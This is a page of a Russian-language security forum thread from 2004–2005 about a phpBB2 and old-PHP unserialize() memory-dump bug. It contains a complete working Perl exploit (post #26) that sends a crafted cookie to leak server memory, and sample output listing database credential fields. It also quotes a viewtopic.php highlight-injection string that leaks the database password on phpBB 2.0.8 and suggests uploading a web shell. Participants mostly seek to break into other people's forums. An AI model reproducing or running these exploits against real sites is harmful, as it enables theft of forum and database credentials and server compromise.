Security Lab



Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти  
Форум » Обсуждение статей (закрыто) » Обсуждение публикаций
Страницы: Пред. 1 2
RSS
phpbb2 + php version < 4.3.10 unserialize() memory dump sql pass...
 
#21
Это нравится:0Да/0Нет
20.12.2004 12:39:29
Цитата
Гость пишет:
Как запустить exe в Xp вылетает окошко и все................
[IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley7.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley36.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG] [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG] CMD
 
 
 
#22
Это нравится:0Да/0Нет
20.12.2004 14:27:07
coded by overdose / bad boyz coding
requete effectuer ...

Это что значит? :(
 
 
 
#23
Это нравится:0Да/0Нет
20.12.2004 15:13:19
[IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG] закачай туда че-нить наподобии шела!
 
 
 
#24
Это нравится:0Да/0Нет
20.12.2004 15:53:13
[IMG]http://www.securitylab.ru/forum/smileys/smiley5.gif[/IMG]
Блин...странно...
У меня все работает...
Выводит:
и т.д.
coded by overdose / bad boyz coding
requete effectuer ...
- string detected : :"test1";
- string detected : LF.(
- string detected :
&;M

- string detected : board_config
- string detected : LF.(
- string detected : userdata
- string detected : LF.(
- string detected : theme
- string detected : LF.(
- string detected : images
- string detected : LF.(
- string detected : lang
- string detected : dbms
- string detected : dbhost
- string detected : dbname
- string detected : dbuser
- string detected : dbpasswd
- string detected : table_prefix
- string detected : PHPBB_INSTALLED
- string detected : LF.(
- string detected : DEBUG
- string detected : tdocs/includes
- string detected : lt_lang
- string detected : russian
- string detected : 42885

короче кучу всякого мусора...
Как среди этого г... отрыть что-нить полезное,нет никаких команд полезных,что б выводил и искал сразу то что нужно!
 
 
 
#25
Это нравится:0Да/0Нет
20.12.2004 15:56:56
лол, а вы хотели.. это же дамп произвольного куска памяти.. Не факт, что в нём будут пассы от mysql. Мне например попались mysql запросы с подставленными данными типа select * from users where user='admin' and pass='password'
попадались и логин пасс к mysql..

Нет какой-либо зависимости, по которой можно было точно сказать - это логин, а это пасс. Один раз у меня были реквизиты вида:
mysql_localhost_root_mysqlpass
другой раз всё это шло отдельно..
 
 
 
#26
Это нравится:0Да/0Нет
20.12.2004 15:58:33
Вот сплоит на perl


#!/usr/bin/perl

#
# Simple phpbb2 + php version < 4.3.10 unserialize() memory dump sql sploit
# Based on http://www.securitylab.ru/_Exploits/2004/12/phpbb+php.c.txt

# cyberlords.met

# Usage: perl spl.pl host phpbb_dir

# Example:  ./spl.pl forum.ru /phpbb/
# Example#2: /spl.pl forum.ru /phpbb/ | strings | awk -F"\n" 'BEGIN{s=0}{s=s+1;printf "string %i:    %s\n",s,$1}'
#
#


use Socket;
use IO::Handle;

my $host=@ARGV[0];
my $dir=@ARGV[1];

socket(SOCK,AF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "socket() failed: $!\n";
connect(SOCK,sockaddr_in(80,inet_aton($host)));
SOCK->autoflush(1);

my $q=qq{GET $dir HTTP/1.1
HOST: $host
Cookie: phpbb2mysql_data=s:400000:%22test1%22%3b; expires=Fri, 24-Dec-2005 21:25:37 GMT;
Cookie: phpbb2mysql_sid=1cfd759c33ba3a45b994c7b7cfd948ec; path=/;
Accept-Language: ru
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close

};

print SOCK $q;

my $all_data,$data,$s;

while(sysread(SOCK,$data,1024)){
$all_data.=$data;
}

while($all_data=~/\%([A-Z0-9]{2})/) {
$s=pack('H8', $1);
$all_data=~s/\%$1/$s/g;
}

print $all_data;
close SOCK;
 
 
 
#27
Это нравится:0Да/0Нет
21.12.2004 09:38:28
После того как залил сплёит на свой сайт, как им пользоваться? Пишу:
/phpbb.pl foum.site.ru
Или как надо?
 
 
 
#28
Это нравится:0Да/0Нет
12.03.2005 23:16:14
Что-то не разберу чё за параметр: nboctettoreadinheap ?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
 
 
#29
Это нравится:0Да/0Нет
01.05.2005 18:49:35
Шанкер логин админа форума обычно смотрится в самом форуме (когда он пишет сообщения)
 
 
 
#30
Это нравится:0Да/0Нет
15.05.2005 02:49:40
а что сам исходник то убрали,  у кого есть кинте плиззз ссылочку , я заберу  ЭЖ)))  плиззз
 
 
 
#31
Это нравится:0Да/0Нет
27.05.2005 12:08:57
Цитата
JULVOTART пишет:
Вопросик. На нужном мне форуме стоит 2.0.8(!). Есть предыдущие ошибки, даюшие пасс админа:
viewtopic.php?p=44&highlight=%2527.$poster=$dbpasswd.%2527
А как узнать логин админа?
Гы-гы-гы ;\
 
 
 
#32
Это нравится:0Да/0Нет
29.05.2005 10:52:16
Цитата
JULVOTART пишет:
Вопросик. На нужном мне форуме стоит 2.0.8(!). Есть предыдущие ошибки, даюшие пасс админа:
viewtopic.php?p=44&highlight=%2527.$poster=$dbpasswd.%2527
А как узнать логин админа?
Ну, это уже верх ламерского маразма! Тут верно кто-то подметил: нужно выпускать книгу с перлами ламеров с этого форума :)
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
 
 
Страницы: Пред. 1 2
Читают тему